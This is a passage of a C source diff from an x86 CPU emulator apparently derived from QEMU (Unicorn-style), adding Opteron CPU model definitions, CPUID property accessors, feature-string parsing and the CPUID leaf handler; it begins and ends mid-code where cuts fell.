1, 2, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | + CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | + CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | + CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | + CPUID_EXT2_PDPE1GB | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | 
CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | + CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | + CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | + CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 62xx class CPU", + }, + { + "Opteron_G5", + 0xd, 0x8000001A, 0, + CPUID_VENDOR_AMD, + 21, 2, 0, + { + // FEAT_1_EDX + CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | + CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | + CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | + CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | + CPUID_DE | CPUID_FP87, + // FEAT_1_ECX + CPUID_EXT_F16C | CPUID_EXT_AVX | CPUID_EXT_XSAVE | + CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | + CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_FMA | + CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, + // FEAT_7_0_EBX + 0, + // FEAT_8000_0001_EDX + CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | + CPUID_EXT2_PDPE1GB | CPUID_EXT2_FXSR | CPUID_EXT2_MMX | + CPUID_EXT2_NX | CPUID_EXT2_PSE36 | CPUID_EXT2_PAT | + CPUID_EXT2_CMOV | CPUID_EXT2_MCA | CPUID_EXT2_PGE | + CPUID_EXT2_MTRR | CPUID_EXT2_SYSCALL | CPUID_EXT2_APIC | + CPUID_EXT2_CX8 | CPUID_EXT2_MCE | CPUID_EXT2_PAE | CPUID_EXT2_MSR | + CPUID_EXT2_TSC | CPUID_EXT2_PSE | CPUID_EXT2_DE | CPUID_EXT2_FPU, + // FEAT_8000_0001_ECX + CPUID_EXT3_TBM | CPUID_EXT3_FMA4 | CPUID_EXT3_XOP | + CPUID_EXT3_3DNOWPREFETCH | CPUID_EXT3_MISALIGNSSE | + CPUID_EXT3_SSE4A | CPUID_EXT3_ABM | CPUID_EXT3_SVM | + CPUID_EXT3_LAHF_LM, + }, + "AMD Opteron 63xx class CPU", + }, +}; + +static uint32_t x86_cpu_get_supported_feature_word(struct uc_struct *uc, FeatureWord w); + +static void report_unavailable_features(FeatureWord w, uint32_t mask) +{ + FeatureWordInfo *f = &feature_word_info[w]; + int i; + + for (i = 0; i < 32; ++i) { + if (1 << i & mask) { + const char *reg = get_register_name_32(f->cpuid_reg); + assert(reg); + fprintf(stderr, "warning: 
%s doesn't support requested feature: " + "CPUID.%02XH:%s%s%s [bit %d]\n", + "TCG", + f->cpuid_eax, reg, + f->feat_names[i] ? "." : "", + f->feat_names[i] ? f->feat_names[i] : "", i); + } + } +} + +static void x86_cpuid_version_get_family(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = (env->cpuid_version >> 8) & 0xf; + if (value == 0xf) { + value += (env->cpuid_version >> 20) & 0xff; + } + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_family(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xff + 0xf; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? 
name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xff00f00; + if (value > 0x0f) { + env->cpuid_version |= 0xf00 | ((value - 0x0f) << 20); + } else { + env->cpuid_version |= value << 8; + } + + return 0; +} + +static void x86_cpuid_version_get_model(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = (env->cpuid_version >> 4) & 0xf; + value |= ((env->cpuid_version >> 16) & 0xf) << 4; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_model(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xff; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? 
name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xf00f0; + env->cpuid_version |= ((value & 0xf) << 4) | ((value >> 4) << 16); + + return 0; +} + +static void x86_cpuid_version_get_stepping(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int64_t value; + + value = env->cpuid_version & 0xf; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_version_set_stepping(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + const int64_t min = 0; + const int64_t max = 0xf; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? 
name : "null", value, min, max); + return -1; + } + + env->cpuid_version &= ~0xf; + env->cpuid_version |= value & 0xf; + + return 0; +} + +static void x86_cpuid_get_level(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_level, name, errp); +} + +static int x86_cpuid_set_level(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_level, name, errp); + + return 0; +} + +static void x86_cpuid_get_xlevel(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_xlevel, name, errp); +} + +static int x86_cpuid_set_xlevel(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + + visit_type_uint32(v, &cpu->env.cpuid_xlevel, name, errp); + + return 0; +} + +static char *x86_cpuid_get_vendor(struct uc_struct *uc, Object *obj, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + char *value; + + value = (char *)g_malloc(CPUID_VENDOR_SZ + 1); + x86_cpu_vendor_words2str(value, env->cpuid_vendor1, env->cpuid_vendor2, + env->cpuid_vendor3); + return value; +} + +static int x86_cpuid_set_vendor(struct uc_struct *uc, Object *obj, const char *value, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int i; + + if (strlen(value) != CPUID_VENDOR_SZ) { + error_set(errp, QERR_PROPERTY_VALUE_BAD, "", + "vendor", value); + return -1; + } + + env->cpuid_vendor1 = 0; + env->cpuid_vendor2 = 0; + env->cpuid_vendor3 = 0; + for (i = 0; i < 4; i++) { + env->cpuid_vendor1 |= ((uint8_t)value[i ]) << (8 * i); + env->cpuid_vendor2 |= ((uint8_t)value[i + 4]) << (8 * i); + env->cpuid_vendor3 |= 
((uint8_t)value[i + 8]) << (8 * i); + } + + return 0; +} + +static char *x86_cpuid_get_model_id(struct uc_struct *uc, Object *obj, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + char *value; + int i; + + value = g_malloc(48 + 1); + for (i = 0; i < 48; i++) { + value[i] = env->cpuid_model[i >> 2] >> (8 * (i & 3)); + } + value[48] = '\0'; + return value; +} + +static int x86_cpuid_set_model_id(struct uc_struct *uc, Object *obj, const char *model_id, + Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + CPUX86State *env = &cpu->env; + int c, len, i; + + if (model_id == NULL) { + model_id = ""; + } + len = strlen(model_id); + memset(env->cpuid_model, 0, 48); + for (i = 0; i < 48; i++) { + if (i >= len) { + c = '\0'; + } else { + c = (uint8_t)model_id[i]; + } + env->cpuid_model[i >> 2] |= c << (8 * (i & 3)); + } + + return 0; +} + +static void x86_cpuid_get_tsc_freq(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + int64_t value; + + value = cpu->env.tsc_khz * 1000; + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_set_tsc_freq(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + const int64_t min = 0; + const int64_t max = INT64_MAX; + Error *local_err = NULL; + int64_t value; + + visit_type_int(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + if (value < min || value > max) { + error_set(errp, QERR_PROPERTY_VALUE_OUT_OF_RANGE, "", + name ? 
name : "null", value, min, max); + return -1; + } + + cpu->env.tsc_khz = (int)(value / 1000); + + return 0; +} + +static void x86_cpuid_get_apic_id(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + int64_t value = cpu->env.cpuid_apic_id; + + visit_type_int(v, &value, name, errp); +} + +static int x86_cpuid_set_apic_id(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + X86CPU *cpu = X86_CPU(uc, obj); + DeviceState *dev = DEVICE(uc, obj); + const int64_t min = 0; + const int64_t max = UINT32_MAX; + Error *error = NULL; + int64_t value; + + if (dev->realized) { + error_setg(errp, "Attempt to set property '%s' on '%s' after " + "it was realized", name, object_get_typename(obj)); + return -1; + } + + visit_type_int(v, &value, name, &error); + if (error) { + error_propagate(errp, error); + return -1; + } + if (value < min || value > max) { + error_setg(errp, "Property %s.%s doesn't take value %" PRId64 + " (minimum: %" PRId64 ", maximum: %" PRId64 ")" , + object_get_typename(obj), name, value, min, max); + return -1; + } + + if ((value != cpu->env.cpuid_apic_id) && cpu_exists(uc, value)) { + error_setg(errp, "CPU with APIC ID %" PRIi64 " exists", value); + return -1; + } + cpu->env.cpuid_apic_id = (uint32_t)value; + + return 0; +} + +/* Generic getter for "feature-words" and "filtered-features" properties */ +static void x86_cpu_get_feature_words(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + uint32_t *array = (uint32_t *)opaque; + FeatureWord w; + Error *err = NULL; + // These all get setup below, so no need to initialise them here. 
+ X86CPUFeatureWordInfo word_infos[FEATURE_WORDS]; + X86CPUFeatureWordInfoList list_entries[FEATURE_WORDS]; + X86CPUFeatureWordInfoList *list = NULL; + + for (w = 0; w < FEATURE_WORDS; w++) { + FeatureWordInfo *wi = &feature_word_info[w]; + X86CPUFeatureWordInfo *qwi = &word_infos[w]; + qwi->cpuid_input_eax = wi->cpuid_eax; + qwi->has_cpuid_input_ecx = wi->cpuid_needs_ecx; + qwi->cpuid_input_ecx = wi->cpuid_ecx; + qwi->cpuid_register = x86_reg_info_32[wi->cpuid_reg].qapi_enum; + qwi->features = array[w]; + + /* List will be in reverse order, but order shouldn't matter */ + list_entries[w].next = list; + list_entries[w].value = &word_infos[w]; + list = &list_entries[w]; + } + + visit_type_X86CPUFeatureWordInfoList(v, &list, "feature-words", &err); + error_propagate(errp, err); +} + +/* Convert all '_' in a feature string option name to '-', to make feature + * name conform to QOM property naming rule, which uses '-' instead of '_'. + */ +static inline void feat2prop(char *s) +{ + while ((s = strchr(s, '_'))) { + *s = '-'; + } +} + +/* Parse "+feature,-feature,feature=foo" CPU feature string + */ +static void x86_cpu_parse_featurestr(CPUState *cs, char *features, + Error **errp) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + char *featurestr; /* Single 'key=value" string being parsed */ + FeatureWord w; + /* Features to be added */ + FeatureWordArray plus_features = { 0 }; + /* Features to be removed */ + FeatureWordArray minus_features = { 0 }; + uint32_t numvalue; + CPUX86State *env = &cpu->env; + Error *local_err = NULL; + + featurestr = features ? 
strtok(features, ",") : NULL; + + while (featurestr) { + char *val; + if (featurestr[0] == '+') { + add_flagname_to_bitmaps(featurestr + 1, plus_features, &local_err); + } else if (featurestr[0] == '-') { + add_flagname_to_bitmaps(featurestr + 1, minus_features, &local_err); + } else if ((val = strchr(featurestr, '='))) { + *val = 0; val++; + feat2prop(featurestr); + if (!strcmp(featurestr, "xlevel")) { + char *err; + char num[32]; + + numvalue = strtoul(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + if (numvalue < 0x80000000) { + numvalue += 0x80000000; + } + snprintf(num, sizeof(num), "%" PRIu32, numvalue); + object_property_parse(cs->uc, OBJECT(cpu), num, featurestr, &local_err); + } else if (!strcmp(featurestr, "tsc-freq")) { + int64_t tsc_freq; + char *err; + char num[32]; + + tsc_freq = strtosz_suffix_unit(val, &err, + STRTOSZ_DEFSUFFIX_B, 1000); + if (tsc_freq < 0 || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + snprintf(num, sizeof(num), "%" PRId64, tsc_freq); + object_property_parse(cs->uc, OBJECT(cpu), num, "tsc-frequency", + &local_err); + } else if (!strcmp(featurestr, "hv-spinlocks")) { + char *err; + const int min = 0xFFF; + char num[32]; + numvalue = strtoul(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + if (numvalue < (uint32_t)min) { + numvalue = min; + } + snprintf(num, sizeof(num), "%" PRId32, numvalue); + object_property_parse(cs->uc, OBJECT(cpu), num, featurestr, &local_err); + } else { + object_property_parse(cs->uc, OBJECT(cpu), val, featurestr, &local_err); + } + } else { + feat2prop(featurestr); + object_property_parse(cs->uc, OBJECT(cpu), "on", featurestr, &local_err); + } + if (local_err) { + error_propagate(errp, local_err); + return; + } + featurestr = strtok(NULL, ","); + } + + if (cpu->host_features) { + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] = + 
x86_cpu_get_supported_feature_word(env->uc, w); + } + } + + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] |= plus_features[w]; + env->features[w] &= ~minus_features[w]; + } +} + +static uint32_t x86_cpu_get_supported_feature_word(struct uc_struct *uc, FeatureWord w) +{ + FeatureWordInfo *wi = &feature_word_info[w]; + + if (tcg_enabled(uc)) { + return wi->tcg_features; + } else { + return ~0; + } +} + +/* + * Filters CPU feature words based on host availability of each feature. + * + * Returns: 0 if all flags are supported by the host, non-zero otherwise. + */ +static int x86_cpu_filter_features(X86CPU *cpu) +{ + CPUX86State *env = &cpu->env; + FeatureWord w; + int rv = 0; + + for (w = 0; w < FEATURE_WORDS; w++) { + uint32_t host_feat = x86_cpu_get_supported_feature_word(env->uc, w); + uint32_t requested_features = env->features[w]; + env->features[w] &= host_feat; + cpu->filtered_features[w] = requested_features & ~env->features[w]; + if (cpu->filtered_features[w]) { + if (cpu->check_cpuid || cpu->enforce_cpuid) { + report_unavailable_features(w, cpu->filtered_features[w]); + } + rv = 1; + } + } + + return rv; +} + +/* Load data from X86CPUDefinition + */ +static void x86_cpu_load_def(X86CPU *cpu, X86CPUDefinition *def, Error **errp) +{ + CPUX86State *env = &cpu->env; + const char *vendor; + FeatureWord w; + + object_property_set_int(env->uc, OBJECT(cpu), def->level, "level", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->family, "family", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->model, "model", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->stepping, "stepping", errp); + object_property_set_int(env->uc, OBJECT(cpu), def->xlevel, "xlevel", errp); + env->cpuid_xlevel2 = def->xlevel2; + cpu->cache_info_passthrough = def->cache_info_passthrough; + object_property_set_str(env->uc, OBJECT(cpu), def->model_id, "model-id", errp); + for (w = 0; w < FEATURE_WORDS; w++) { + env->features[w] = def->features[w]; + } + + 
env->features[FEAT_1_ECX] |= CPUID_EXT_HYPERVISOR; + + /* sysenter isn't supported in compatibility mode on AMD, + * syscall isn't supported in compatibility mode on Intel. + * Normally we advertise the actual CPU vendor, but you can + * override this using the 'vendor' property if you want to use + * KVM's sysenter/syscall emulation in compatibility mode and + * when doing cross vendor migration + */ + vendor = def->vendor; + + object_property_set_str(env->uc, OBJECT(cpu), vendor, "vendor", errp); +} + +X86CPU *cpu_x86_create(struct uc_struct *uc, const char *cpu_model, Error **errp) +{ + X86CPU *cpu = NULL; + ObjectClass *oc; + gchar **model_pieces; + char *name, *features; + Error *error = NULL; + + model_pieces = g_strsplit(cpu_model, ",", 2); + if (!model_pieces[0]) { + error_setg(&error, "Invalid/empty CPU model name"); + goto out; + } + name = model_pieces[0]; + features = model_pieces[1]; + + oc = x86_cpu_class_by_name(uc, name); + if (oc == NULL) { + error_setg(&error, "Unable to find CPU definition: %s", name); + goto out; + } + + cpu = X86_CPU(uc, object_new(uc, object_class_get_name(oc))); + + x86_cpu_parse_featurestr(CPU(cpu), features, &error); + if (error) { + goto out; + } + +out: + if (error != NULL) { + error_propagate(errp, error); + if (cpu) { + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + } + g_strfreev(model_pieces); + return cpu; +} + +X86CPU *cpu_x86_init(struct uc_struct *uc, const char *cpu_model) +{ + Error *error = NULL; + X86CPU *cpu; + + cpu = cpu_x86_create(uc, cpu_model, &error); + if (error) { + goto out; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &error); + +out: + if (error) { + error_free(error); + if (cpu != NULL) { + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + } + return cpu; +} + +static void x86_cpu_cpudef_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + X86CPUDefinition *cpudef = data; + X86CPUClass *xcc = X86_CPU_CLASS(uc, oc); + + xcc->cpu_def = cpudef; +} + +static 
void x86_register_cpudef_type(struct uc_struct *uc, X86CPUDefinition *def) +{ + char *typename = x86_cpu_type_name(def->name); + TypeInfo ti = { + typename, + TYPE_X86_CPU, + + 0, + 0, + NULL, + + NULL, + NULL, + NULL, + + def, + + x86_cpu_cpudef_class_init, + }; + + type_register(uc, &ti); + g_free(typename); +} + +#if !defined(CONFIG_USER_ONLY) + +void cpu_clear_apic_feature(CPUX86State *env) +{ + env->features[FEAT_1_EDX] &= ~CPUID_APIC; +} + +#endif /* !CONFIG_USER_ONLY */ + +/* Initialize list of CPU models, filling some non-static fields if necessary + */ +void x86_cpudef_setup(void) +{ + int i, j; + static const char *model_with_versions[] = { "qemu32", "qemu64", "athlon" }; + + for (i = 0; i < ARRAY_SIZE(builtin_x86_defs); ++i) { + X86CPUDefinition *def = &builtin_x86_defs[i]; + + /* Look for specific "cpudef" models that */ + /* have the QEMU version in .model_id */ + for (j = 0; j < ARRAY_SIZE(model_with_versions); j++) { + if (strcmp(model_with_versions[j], def->name) == 0) { + pstrcpy(def->model_id, sizeof(def->model_id), + "QEMU Virtual CPU version "); + break; + } + } + } +} + +static void get_cpuid_vendor(CPUX86State *env, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx) +{ + *ebx = env->cpuid_vendor1; + *edx = env->cpuid_vendor2; + *ecx = env->cpuid_vendor3; +} + +void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, + uint32_t *eax, uint32_t *ebx, + uint32_t *ecx, uint32_t *edx) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + /* test if maximum index reached */ + if (index & 0x80000000) { + if (index > env->cpuid_xlevel) { + if (env->cpuid_xlevel2 > 0) { + /* Handle the Centaur's CPUID instruction. */ + if (index > env->cpuid_xlevel2) { + index = env->cpuid_xlevel2; + } else if (index < 0xC0000000) { + index = env->cpuid_xlevel; + } + } else { + /* Intel documentation states that invalid EAX input will + * return the same information as EAX=cpuid_level + * (Intel SDM Vol. 
2A - Instruction Set Reference - CPUID) + */ + index = env->cpuid_level; + } + } + } else { + if (index > env->cpuid_level) + index = env->cpuid_level; + } + + switch(index) { + case 0: + *eax = env->cpuid_level; + get_cpuid_vendor(env, ebx, ecx, edx); + break; + case 1: + *eax = env->cpuid_version; + *ebx = (env->cpuid_apic_id << 24) | 8 << 8; /* CLFLUSH size in quad words, Linux wants it. */ + *ecx = env->features[FEAT_1_ECX]; + *edx = env->features[FEAT_1_EDX]; + if (cs->nr_cores * cs->nr_threads > 1) { + *ebx |= (cs->nr_cores * cs->nr_threads) << 16; + *edx |= 1 << 28; /* HTT bit */ + } + break; + case 2: + /* cache info: needed for Pentium Pro compatibility */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = 1; /* Number of CPUID[EAX=2] calls required */ + *ebx = 0; + *ecx = 0; + *edx = (L1D_DESCRIPTOR << 16) | \ + (L1I_DESCRIPTOR << 8) | \ + (L2_DESCRIPTOR); + break; + case 4: + /* cache info: needed for Core compatibility */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, count, eax, ebx, ecx, edx); + *eax &= ~0xFC000000; + } else { + *eax = 0; + switch (count) { + case 0: /* L1 dcache info */ + *eax |= CPUID_4_TYPE_DCACHE | \ + CPUID_4_LEVEL(1) | \ + CPUID_4_SELF_INIT_LEVEL; + *ebx = (L1D_LINE_SIZE - 1) | \ + ((L1D_PARTITIONS - 1) << 12) | \ + ((L1D_ASSOCIATIVITY - 1) << 22); + *ecx = L1D_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + case 1: /* L1 icache info */ + *eax |= CPUID_4_TYPE_ICACHE | \ + CPUID_4_LEVEL(1) | \ + CPUID_4_SELF_INIT_LEVEL; + *ebx = (L1I_LINE_SIZE - 1) | \ + ((L1I_PARTITIONS - 1) << 12) | \ + ((L1I_ASSOCIATIVITY - 1) << 22); + *ecx = L1I_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + case 2: /* L2 cache info */ + *eax |= CPUID_4_TYPE_UNIFIED | \ + CPUID_4_LEVEL(2) | \ + CPUID_4_SELF_INIT_LEVEL; + if (cs->nr_threads > 1) { + *eax |= (cs->nr_threads - 1) << 14; + } + *ebx = (L2_LINE_SIZE - 1) | \ + ((L2_PARTITIONS - 1) << 12) | \ + ((L2_ASSOCIATIVITY - 1) << 
22); + *ecx = L2_SETS - 1; + *edx = CPUID_4_NO_INVD_SHARING; + break; + default: /* end of info */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + } + } + + /* QEMU gives out its own APIC IDs, never pass down bits 31..26. */ + if ((*eax & 31) && cs->nr_cores > 1) { + *eax |= (cs->nr_cores - 1) << 26; + } + break; + case 5: + /* mwait info: needed for Core compatibility */ + *eax = 0; /* Smallest monitor-line size in bytes */ + *ebx = 0; /* Largest monitor-line size in bytes */ + *ecx = CPUID_MWAIT_EMX | CPUID_MWAIT_IBE; + *edx = 0; + break; + case 6: + /* Thermal and Power Leaf */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 7: + /* Structured Extended Feature Flags Enumeration Leaf */ + if (count == 0) { + *eax = 0; /* Maximum ECX value for sub-leaves */ + *ebx = env->features[FEAT_7_0_EBX]; /* Feature flags */ + *ecx = 0; /* Reserved */ + *edx = 0; /* Reserved */ + } else { + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + } + break; + case 9: + /* Direct Cache Access Information Leaf */ + *eax = 0; /* Bits 0-31 in DCA_CAP MSR */ + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xA: + /* Architectural Performance Monitoring Leaf */ + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 0; + break; + case 0xD: { + break; + } + case 0x80000000: + *eax = env->cpuid_xlevel; + *ebx = env->cpuid_vendor1; + *edx = env->cpuid_vendor2; + *ecx = env->cpuid_vendor3; + break; + case 0x80000001: + *eax = env->cpuid_version; + *ebx = 0; + *ecx = env->features[FEAT_8000_0001_ECX]; + *edx = env->features[FEAT_8000_0001_EDX]; + + /* The Linux kernel checks for the CMPLegacy bit and + * discards multiple thread information if it is set. + * So dont set it here for Intel to make Linux guests happy. 
+ */ + if (cs->nr_cores * cs->nr_threads > 1) { + uint32_t tebx, tecx, tedx; + get_cpuid_vendor(env, &tebx, &tecx, &tedx); + if (tebx != CPUID_VENDOR_INTEL_1 || + tedx != CPUID_VENDOR_INTEL_2 || + tecx != CPUID_VENDOR_INTEL_3) { + *ecx |= 1 << 1; /* CmpLegacy bit */ + } + } + break; + case 0x80000002: + case 0x80000003: + case 0x80000004: + *eax = env->cpuid_model[(index - 0x80000002) * 4 + 0]; + *ebx = env->cpuid_model[(index - 0x80000002) * 4 + 1]; + *ecx = env->cpuid_model[(index - 0x80000002) * 4 + 2]; + *edx = env->cpuid_model[(index - 0x80000002) * 4 + 3]; + break; + case 0x80000005: + /* cache info (L1 cache) */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = (L1_DTLB_2M_ASSOC << 24) | (L1_DTLB_2M_ENTRIES << 16) | \ + (L1_ITLB_2M_ASSOC << 8) | (L1_ITLB_2M_ENTRIES); + *ebx = (L1_DTLB_4K_ASSOC << 24) | (L1_DTLB_4K_ENTRIES << 16) | \ + (L1_ITLB_4K_ASSOC << 8) | (L1_ITLB_4K_ENTRIES); + *ecx = (L1D_SIZE_KB_AMD << 24) | (L1D_ASSOCIATIVITY_AMD << 16) | \ + (L1D_LINES_PER_TAG << 8) | (L1D_LINE_SIZE); + *edx = (L1I_SIZE_KB_AMD << 24) | (L1I_ASSOCIATIVITY_AMD << 16) | \ + (L1I_LINES_PER_TAG << 8) | (L1I_LINE_SIZE); + break; + case 0x80000006: + /* cache info (L2 cache) */ + if (cpu->cache_info_passthrough) { + host_cpuid(index, 0, eax, ebx, ecx, edx); + break; + } + *eax = (AMD_ENC_ASSOC(L2_DTLB_2M_ASSOC) << 28) | \ + (L2_DTLB_2M_ENTRIES << 16) | \ + (AMD_ENC_ASSOC(L2_ITLB_2M_ASSOC) << 12) | \ + (L2_ITLB_2M_ENTRIES); + *ebx = (AMD_ENC_ASSOC(L2_DTLB_4K_ASSOC) << 28) | \ + (L2_DTLB_4K_ENTRIES << 16) | \ + (AMD_ENC_ASSOC(L2_ITLB_4K_ASSOC) << 12) | \ + (L2_ITLB_4K_ENTRIES); + *ecx = (L2_SIZE_KB_AMD << 16) | \ + (AMD_ENC_ASSOC(L2_ASSOCIATIVITY) << 12) | \ + (L2_LINES_PER_TAG << 8) | (L2_LINE_SIZE); + *edx = ((L3_SIZE_KB/512) << 18) | \ + (AMD_ENC_ASSOC(L3_ASSOCIATIVITY) << 12) | \ + (L3_LINES_PER_TAG << 8) | (L3_LINE_SIZE); + break; + case 0x80000007: + *eax = 0; + *ebx = 0; + *ecx = 0; + *edx = 
